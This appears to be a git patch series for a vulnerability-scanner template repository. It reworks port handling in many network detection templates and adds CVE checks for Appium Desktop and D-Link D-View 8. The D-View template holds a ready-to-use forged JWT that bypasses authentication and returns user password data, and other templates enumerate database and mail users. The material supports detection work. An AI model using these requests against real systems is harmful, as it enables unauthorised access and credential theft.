host: - "{{Hostname}}" - - "{{Host}}:445" + port: 445 matchers: - type: word diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml index d63b816e07..5e263cb783 100644 --- a/network/detection/smtp-detect.yaml +++ b/network/detection/smtp-detect.yaml @@ -15,7 +15,8 @@ tcp: - data: "\r\n" host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 + matchers: - type: word words: diff --git a/network/detection/sshd-dropbear-detect.yaml b/network/detection/sshd-dropbear-detect.yaml index 96f5143603..d99362fa58 100644 --- a/network/detection/sshd-dropbear-detect.yaml +++ b/network/detection/sshd-dropbear-detect.yaml @@ -18,7 +18,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers: - type: word diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml index 2970b2d555..93df953557 100644 --- a/network/detection/starttls-mail-detect.yaml +++ b/network/detection/starttls-mail-detect.yaml @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word diff --git a/network/detection/teamspeak3-detect.yaml b/network/detection/teamspeak3-detect.yaml index d3660c3e69..b09be70bd9 100644 --- a/network/detection/teamspeak3-detect.yaml +++ b/network/detection/teamspeak3-detect.yaml @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:2002" + port: 2002 matchers: - type: word diff --git a/network/detection/telnet-detect.yaml b/network/detection/telnet-detect.yaml index a12206e962..e68df9520c 100644 --- a/network/detection/telnet-detect.yaml +++ b/network/detection/telnet-detect.yaml @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:23" + port: 23 matchers: - type: word diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml index 9bf92503a0..f2d966de42 100644 --- a/network/detection/totemomail-smtp-detect.yaml +++ b/network/detection/totemomail-smtp-detect.yaml @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word diff --git a/network/detection/vmware-authentication-daemon-detect.yaml b/network/detection/vmware-authentication-daemon-detect.yaml index 60c21d02b4..e40312fe68 100644 --- a/network/detection/vmware-authentication-daemon-detect.yaml +++ b/network/detection/vmware-authentication-daemon-detect.yaml @@ -18,7 +18,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:902" + port: 902 matchers: - type: word diff --git a/network/detection/vnc-service-detect.yaml b/network/detection/vnc-service-detect.yaml index 0fe419db1c..b92a47d673 100644 --- a/network/detection/vnc-service-detect.yaml +++ b/network/detection/vnc-service-detect.yaml @@ -15,8 +15,8 @@ tcp: - inputs: - data: "\r\n" host: - - "{{Host}}:5900" - "{{Hostname}}" + port: 5900 matchers: - type: word diff --git a/network/detection/xlight-ftp-service-detect.yaml b/network/detection/xlight-ftp-service-detect.yaml index 910c17e7b8..ffcb30c9f4 100644 --- a/network/detection/xlight-ftp-service-detect.yaml +++ b/network/detection/xlight-ftp-service-detect.yaml @@ -18,7 +18,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 matchers: - type: word diff --git a/network/enumeration/beanstalk-service.yaml b/network/enumeration/beanstalk-service.yaml index 364078788d..104d8c3fd1 100644 --- a/network/enumeration/beanstalk-service.yaml +++ b/network/enumeration/beanstalk-service.yaml @@ -20,7 +20,8 @@ tcp: read: 8 host: - - "{{Host}}:11300" + - "{{Hostname}}" + port: 11300 matchers: - type: word diff --git a/network/enumeration/kafka-topics-list.yaml b/network/enumeration/kafka-topics-list.yaml index 7bc3dfa4f4..fce59673c7 100644 --- a/network/enumeration/kafka-topics-list.yaml +++ b/network/enumeration/kafka-topics-list.yaml @@ -23,7 +23,8 @@ tcp: read: 1024 host: - - "{{Host}}:9092" + - "{{Hostname}}" + port: 9092 matchers-condition: or matchers: diff --git a/network/enumeration/mongodb-info-enum.yaml b/network/enumeration/mongodb-info-enum.yaml index f142bf6a5b..6f070dcde2 100644 --- a/network/enumeration/mongodb-info-enum.yaml +++ b/network/enumeration/mongodb-info-enum.yaml @@ -25,7 +25,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:27017" + port: 27017 read-size: 2048 matchers: diff --git a/network/enumeration/niagara-fox-info-enum.yaml b/network/enumeration/niagara-fox-info-enum.yaml index d7250f9014..80eb85050b 100644 --- a/network/enumeration/niagara-fox-info-enum.yaml +++ b/network/enumeration/niagara-fox-info-enum.yaml @@ -19,7 +19,7 @@ tcp: - data: "fox a 1 -1 fox hello\n{\nfox.version=s:1.0\nid=i:1\n};;\n" host: - "{{Hostname}}" - - "{{Host}}:1911" + port: 1911 matchers: - type: word diff --git a/network/enumeration/psql-user-enum.yaml b/network/enumeration/psql-user-enum.yaml index e35f0ef8d0..eb224be71e 100644 --- a/network/enumeration/psql-user-enum.yaml +++ b/network/enumeration/psql-user-enum.yaml @@ -21,7 +21,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:5432" + port: 5432 attack: clusterbomb payloads: diff --git a/network/enumeration/smtp-commands-enum.yaml b/network/enumeration/smtp-commands-enum.yaml index e87c3b61e0..10729964ed 100644 --- a/network/enumeration/smtp-commands-enum.yaml +++ b/network/enumeration/smtp-commands-enum.yaml @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml index 4a8cc9d900..6749a789c3 100644 --- a/network/enumeration/smtp/smtp-user-enum.yaml +++ b/network/enumeration/smtp/smtp-user-enum.yaml @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 attack: batteringram payloads: diff --git a/network/exposures/cisco-smi-exposure.yaml b/network/exposures/cisco-smi-exposure.yaml index 5ad14a2be3..2ac4e72017 100644 --- a/network/exposures/cisco-smi-exposure.yaml +++ b/network/exposures/cisco-smi-exposure.yaml @@ -26,7 +26,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:4786" + port: 4786 matchers: - type: word diff --git a/network/exposures/exposed-adb.yaml b/network/exposures/exposed-adb.yaml index 6c05d3c22e..4a678cc68c 100644 --- a/network/exposures/exposed-adb.yaml +++ b/network/exposures/exposed-adb.yaml @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:5555" + port: 5555 matchers: - type: word diff --git a/network/exposures/exposed-dockerd.yaml b/network/exposures/exposed-dockerd.yaml index 04ac7db27a..9fa8a541e3 100644 --- a/network/exposures/exposed-dockerd.yaml +++ b/network/exposures/exposed-dockerd.yaml @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:2375" + port: 2375 matchers: - type: word diff --git a/network/exposures/exposed-redis.yaml b/network/exposures/exposed-redis.yaml index bf0d983473..5abd6d2c3d 100644 --- a/network/exposures/exposed-redis.yaml +++ b/network/exposures/exposed-redis.yaml @@ -20,10 +20,8 @@ tcp: - data: "info\r\nquit\r\n" host: - - "{{Hostname}}" - - "{{Host}}:6379" - "tls://{Hostname}}" - - "tls://{{Host}}:6380" + port: 6380 read-size: 2048 matchers-condition: and diff --git a/network/exposures/exposed-zookeeper.yaml b/network/exposures/exposed-zookeeper.yaml index 5bd1d628b4..87d6712ba7 100644 --- a/network/exposures/exposed-zookeeper.yaml +++ b/network/exposures/exposed-zookeeper.yaml @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:2181" + port: 2181 read-size: 2048 matchers: diff --git a/network/misconfig/apache-dubbo-unauth.yaml b/network/misconfig/apache-dubbo-unauth.yaml index ad5622afd6..0ed64221ab 100644 --- a/network/misconfig/apache-dubbo-unauth.yaml +++ b/network/misconfig/apache-dubbo-unauth.yaml @@ -21,7 +21,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:20880" + port: 20880 read-size: 2048 matchers: diff --git a/network/misconfig/apache-rocketmq-broker-unauth.yaml b/network/misconfig/apache-rocketmq-broker-unauth.yaml index 5b688e9d1c..eae52acaca 100644 --- a/network/misconfig/apache-rocketmq-broker-unauth.yaml +++ b/network/misconfig/apache-rocketmq-broker-unauth.yaml @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:10911" + port: 10911 read-size: 2048 matchers-condition: and diff --git a/network/misconfig/clamav-unauth.yaml b/network/misconfig/clamav-unauth.yaml index bd6b28b43a..8b5ccff311 100644 --- a/network/misconfig/clamav-unauth.yaml +++ b/network/misconfig/clamav-unauth.yaml @@ -22,7 +22,7 @@ tcp: - data: "SCAN /nonexistent/{{to_lower(rand_text_alpha(10))}}\r\n" host: - "{{Hostname}}" - - "{{Host}}:3310" + port: 3310 read-size: 48 matchers: diff --git a/network/misconfig/clickhouse-unauth.yaml b/network/misconfig/clickhouse-unauth.yaml index 868bf37400..3bd27b9528 100644 --- a/network/misconfig/clickhouse-unauth.yaml +++ b/network/misconfig/clickhouse-unauth.yaml @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:9000" + port: 9000 read-size: 100 matchers: diff --git a/network/misconfig/dropbear-weakalgo.yaml b/network/misconfig/dropbear-weakalgo.yaml index a17caa95ad..f597277415 100644 --- a/network/misconfig/dropbear-weakalgo.yaml +++ b/network/misconfig/dropbear-weakalgo.yaml @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers: - type: word diff --git a/network/misconfig/dropbear-weakmac.yaml b/network/misconfig/dropbear-weakmac.yaml index 1b1ffefb43..0fd36cf4fd 100644 --- a/network/misconfig/dropbear-weakmac.yaml +++ b/network/misconfig/dropbear-weakmac.yaml @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers-condition: and matchers: diff --git a/network/misconfig/ganglia-xml-grid-monitor.yaml b/network/misconfig/ganglia-xml-grid-monitor.yaml index 0c08ca64b4..a7816a7dbd 100644 --- a/network/misconfig/ganglia-xml-grid-monitor.yaml +++ b/network/misconfig/ganglia-xml-grid-monitor.yaml @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:8649" + port: 8649 read-size: 2048 matchers: diff --git a/network/misconfig/memcached-stats.yaml b/network/misconfig/memcached-stats.yaml index f0b6d59076..3d7935ea93 100644 --- a/network/misconfig/memcached-stats.yaml +++ b/network/misconfig/memcached-stats.yaml @@ -16,7 +16,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:11211" + port: 11211 read-size: 2048 matchers: diff --git a/network/misconfig/mongodb-unauth.yaml b/network/misconfig/mongodb-unauth.yaml index 658f0aaa48..1a68ce191f 100644 --- a/network/misconfig/mongodb-unauth.yaml +++ b/network/misconfig/mongodb-unauth.yaml @@ -21,7 +21,8 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:27017" + port: 27017 + read-size: 2048 matchers: - type: word diff --git a/network/misconfig/mysql-native-password.yaml b/network/misconfig/mysql-native-password.yaml index f668b03555..83386d529c 100644 --- a/network/misconfig/mysql-native-password.yaml +++ b/network/misconfig/mysql-native-password.yaml @@ -18,7 +18,7 @@ info: tcp: - host: - "{{Hostname}}" - - "{{Host}}:3306" + port: 3306 matchers: - type: word diff --git a/network/misconfig/printers-info-leak.yaml b/network/misconfig/printers-info-leak.yaml index c3c0a66b09..2bcb745a1e 100644 --- a/network/misconfig/printers-info-leak.yaml +++ b/network/misconfig/printers-info-leak.yaml @@ -16,7 +16,9 @@ tcp: - inputs: - data: "@PJL INFO STATUS\n" host: - - "{{Host}}:9100" + - "{{Hostname}}" + port: 9100 + matchers: - type: word words: diff --git a/network/misconfig/sap-router-info-leak.yaml b/network/misconfig/sap-router-info-leak.yaml index 92736e7e1e..ee872add7f 100644 --- a/network/misconfig/sap-router-info-leak.yaml +++ b/network/misconfig/sap-router-info-leak.yaml @@ -19,7 +19,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:3299" + port: 3299 read-size: 2048 matchers: diff --git a/network/misconfig/tidb-native-password.yaml b/network/misconfig/tidb-native-password.yaml index 54ccad4c2d..d131d74ee7 100644 --- a/network/misconfig/tidb-native-password.yaml +++ b/network/misconfig/tidb-native-password.yaml @@ -16,7 +16,7 @@ info: tcp: - host: - "{{Hostname}}" - - "{{Host}}:4000" + port: 4000 matchers: - type: word diff --git a/network/misconfig/tidb-unauth.yaml b/network/misconfig/tidb-unauth.yaml index 5b5e8a997f..943586a9ad 100644 --- a/network/misconfig/tidb-unauth.yaml +++ b/network/misconfig/tidb-unauth.yaml @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:4000" + port: 4000 read-size: 1024 diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml index cbe4f4cceb..105301b3a5 100644 --- a/network/misconfig/unauth-psql.yaml +++ b/network/misconfig/unauth-psql.yaml @@ -24,7 +24,7 @@ tcp: read: 1024 host: - "{{Hostname}}" - - "{{Host}}:5432" + port: 5432 matchers-condition: and matchers: diff --git a/network/vulnerabilities/clockwatch-enterprise-rce.yaml b/network/vulnerabilities/clockwatch-enterprise-rce.yaml index 3418380f5f..b42c2cc72b 100644 --- a/network/vulnerabilities/clockwatch-enterprise-rce.yaml +++ b/network/vulnerabilities/clockwatch-enterprise-rce.yaml @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:1001" + port: 1001 matchers-condition: and matchers: From ae67cf87ba6fac76bc89a70d92e4a2b0108d04da Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Sep 2023 12:33:31 +0530 Subject: [PATCH 03/23] minor update --- http/cves/2023/CVE-2023-2479.yaml | 46 ++++++++++++++----------------- 1 file changed, 20 insertions(+), 26 deletions(-) diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index 54d902d607..4400dbfcef 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -1,53 +1,47 @@ id: CVE-2023-2479 info: - name: Zero Click Remote Code Execution on Appium Desktop Server - author: zn9988, Aden Yap Chuen Zhen (chuenzhen.yap2@baesystems.com) - severity: Critical - description: Appium Desktop Server is susceptible to an unauthenticated remote code execution vulnerability. + name: Appium Desktop Server - Remote Code Execution + author: zn9988 + severity: critical + description: | + OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4. + remediation: Fixed in v1.22.3-4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2479 + cwe-id: CWE-78 + epss-score: 0.0008 + epss-percentile: 0.3333 + cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:* reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-2479 - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/ - tags: http,rce,dast,oast,cve,electron + tags: cve,cve2023,appium,oast,rce -requests: +http: - method: GET path: - '{{BaseURL}}/?url=' matchers-condition: and matchers: - # Response String + - type: word + part: interactsh_protocol + words: + - "dns" + - type: word part: body words: - "The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource" - # Status Code - - type: status - status: - - 404 - - # Content Type - type: word part: header words: - "application/json" - # Response Header - - type: word - part: header - words: - - "X-Powered-By: Express" - - # Captured the interact callbacks - - type: word - part: interactsh_protocol - condition: or - words: - - "dns" - - "http" + - type: status + status: + - 404 From 6d40f1256dc7d65bd7c03ad42de5e38f228191d6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Sep 2023 12:42:57 +0530 Subject: [PATCH 04/23] fix trail space --- http/cves/2023/CVE-2023-2479.yaml | 32 +++++++++++++++---------------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index 4400dbfcef..3fa45b321e 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -15,7 +15,7 @@ info: epss-score: 0.0008 epss-percentile: 0.3333 cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:* - reference: + reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-2479 - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/ tags: cve,cve2023,appium,oast,rce @@ -24,24 +24,24 @@ http: - method: GET path: - '{{BaseURL}}/?url=' - + matchers-condition: and matchers: - type: word - part: interactsh_protocol + part: body + words: + - 'The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource' + + - type: word + part: header + words: + - 'application/json' + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - - type: word - part: body - words: - - "The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource" - - - type: word - part: header - words: - - "application/json" - - - type: status - status: - - 404 + - type: status + status: + - 404 From 52c9d36132be16f932a72b3a3f8c9b90e44d53e6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Sep 2023 20:05:39 +0530 Subject: [PATCH 05/23] Create CVE-2023-5074.yaml --- http/cves/2023/CVE-2023-5074.yaml | 44 +++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-5074.yaml diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml new file mode 100644 index 0000000000..456ecf8740 --- /dev/null +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-5074 + +info: + name: Authentication Bypass in D-Link D-View 8 + author: DhiyaneshDK + severity: critical + description: | + Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28 + remediation: | + Upgrade to the latest version to mitigate this vulnerability. + reference: + - https://www.tenable.com/security/research/tra-2023-32 + - https://nvd.nist.gov/vuln/detail/CVE-2023-5074 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0563 + cwe-id: CWE-798 + epss-score: 0.00563 + epss-percentile: 0.74832 + cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1317621215 + fofa-query: icon_hash="-1317621215" + vendor: dlink + product: d-view_8 + tags: cve,cve2023,d-link,auth-bypass + +http: + - raw: + - | + GET /dview8/api/usersByLevel HTTP/1.1 + Host: {{Hostname}} + Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")' + - 'contains(header, "application/json")' + condition: and From e48aa75f0f756f6a0500e78f27c17b8a74f75822 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Sep 2023 20:09:49 +0530 Subject: [PATCH 06/23] fix-trail-spacing --- http/cves/2023/CVE-2023-5074.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 456ecf8740..46e76b4bf8 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -40,5 +40,5 @@ http: dsl: - 'status_code == 200' - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")' - - 'contains(header, "application/json")' + - 'contains(header, "application/json")' condition: and From e86f0d7b5ba1880d8634d8423b84d0788c9848f9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Sep 2023 15:40:23 +0000 Subject: [PATCH 07/23] Auto Generated New Template Addition List [Tue Sep 26 15:40:23 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 702c5ee701..7a445e9a4c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2023/CVE-2023-2479.yaml http/cves/2023/CVE-2023-2766.yaml http/cves/2023/CVE-2023-36845.yaml http/cves/2023/CVE-2023-42442.yaml From d5c5ebd33fb2c8e6e15bb95dcfdfb357d17b2a9b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Sep 2023 15:40:27 +0000 Subject: [PATCH 08/23] Auto Generated Templates Checksum [Tue Sep 26 15:40:27 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c58d17cb1e..5a0908491c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2540,6 +2540,7 @@ http/cves/2023/CVE-2023-24657.yaml:7f6b27269830343d72aabbf9cc3b6468b0402832 http/cves/2023/CVE-2023-24733.yaml:2b371df5ef8cff42ce8aecc6ef5670299835f5a5 http/cves/2023/CVE-2023-24735.yaml:571e0c8b77e6db4d05d1b26591ce8c23a6605826 http/cves/2023/CVE-2023-24737.yaml:4054ade9e45e3b511951b4ef62d855c3f224fbf1 +http/cves/2023/CVE-2023-2479.yaml:6cfd1b29cde0f44fa2a4f6cbcd2a0a061f146d4a http/cves/2023/CVE-2023-25135.yaml:6fde05cc952e0a48856618cc9f0354636815791a http/cves/2023/CVE-2023-25157.yaml:75256e12bfe90097324f0600dcf0e8d2116e9f99 http/cves/2023/CVE-2023-25346.yaml:24944581a291d6d9ab20cb2c6f4efe877149ae44 @@ -4522,7 +4523,7 @@ http/misconfiguration/installer/netsparker-enterprise-installer.yaml:d9b8f35bbf4 http/misconfiguration/installer/nginx-auto-installer.yaml:a45c4bc03311eb33170957d65fa62b0a194427d6 http/misconfiguration/installer/nodebb-installer.yaml:7a5df25da7163e43f58532154f602652d0b013cc http/misconfiguration/installer/nopcommerce-installer.yaml:4568895e83d6888dd2e4eefb6df641258b227f79 -http/misconfiguration/installer/ojs-installer.yaml:a8737d5a86376bda445e5fe2c141143a79cf5e29 +http/misconfiguration/installer/ojs-installer.yaml:7317b5f8e060b50bc6d4c41a04f529ac758b12ed http/misconfiguration/installer/openmage-install.yaml:4aa42695d5062c627d4290348a5459f57ecf5a14 http/misconfiguration/installer/openshift-installer-panel.yaml:d8a752d34b8064b82613b1fdd6c70c3dc16bb6ff http/misconfiguration/installer/opensis-installer.yaml:b2b80ff3af51a7ccc9f2f70da8853f4a4ac0b85a @@ -7192,7 +7193,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:c231fe51c6ebce79078483d2407f8f3ba3cefd42 +templates-checksum.txt:33a2e83e365b1af1d3d690113fb4f5888a24aeb6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From eec309f75f4b648daad0e33a887126bb7352e947 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Sep 2023 15:42:16 +0000 Subject: [PATCH 09/23] TemplateMan Update [Tue Sep 26 15:42:15 UTC 2023] :robot: --- http/cves/2023/CVE-2023-2479.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index 3fa45b321e..5339dfe1c3 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -6,18 +6,19 @@ info: severity: critical description: | OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-2479 + - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/ remediation: Fixed in v1.22.3-4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2479 cwe-id: CWE-78 - epss-score: 0.0008 - epss-percentile: 0.3333 cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:* - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-2479 - - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/ + epss-score: 0.0008 + metadata: + max-request: 1 tags: cve,cve2023,appium,oast,rce http: From 3b789d908b630feb99d1ee2839dc9e3ff4ba968f Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 26 Sep 2023 21:13:29 +0530 Subject: [PATCH 10/23] Update CVE-2023-5074.yaml --- http/cves/2023/CVE-2023-5074.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 46e76b4bf8..4419bdc1dd 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -1,7 +1,7 @@ id: CVE-2023-5074 info: - name: Authentication Bypass in D-Link D-View 8 + name: D-Link D-View 8 v2.0.1.28 - Authentication Bypass author: DhiyaneshDK severity: critical description: | From 5f4f590e7f58e1a2e3fc9157f4148cbe82d14439 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 26 Sep 2023 21:16:55 +0530 Subject: [PATCH 11/23] Update CVE-2023-5074.yaml --- http/cves/2023/CVE-2023-5074.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 4419bdc1dd..f84d30e121 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -1,7 +1,7 @@ id: CVE-2023-5074 info: - name: D-Link D-View 8 v2.0.1.28 - Authentication Bypass + name: D-Link D-View 8 - Authentication Bypass author: DhiyaneshDK severity: critical description: | From 17669c7fd87a74e329182c6778dee7307541cebd Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 26 Sep 2023 21:21:03 +0530 Subject: [PATCH 12/23] lint -fix --- http/cves/2023/CVE-2023-5074.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index f84d30e121..d6b876e592 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -1,7 +1,7 @@ id: CVE-2023-5074 info: - name: D-Link D-View 8 - Authentication Bypass + name: D-Link D-View 8 v2.0.1.28 - Authentication Bypass author: DhiyaneshDK severity: critical description: | From 92df843a93c98d9fc9a9da0c31e07d17aa574b0f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Sep 2023 15:54:33 +0000 Subject: [PATCH 13/23] Auto Generated New Template Addition List [Tue Sep 26 15:54:33 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7a445e9a4c..9442a7afae 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-2766.yaml http/cves/2023/CVE-2023-36845.yaml http/cves/2023/CVE-2023-42442.yaml http/cves/2023/CVE-2023-4568.yaml +http/cves/2023/CVE-2023-5074.yaml http/exposures/tokens/jotform/jotform-api-key.yaml http/misconfiguration/installer/akeeba-installer.yaml http/misconfiguration/installer/alma-installer.yaml From f112d03d0019d4641a98916267ea53972d7dfac8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Sep 2023 15:54:33 +0000 Subject: [PATCH 14/23] Auto Generated cves.json [Tue Sep 26 15:54:33 UTC 2023] :robot: --- cves.json | 3 +++ cves.json-checksum.txt | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 78099bc39d..90a1d52a17 100644 --- a/cves.json +++ b/cves.json @@ -1915,6 +1915,7 @@ {"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at 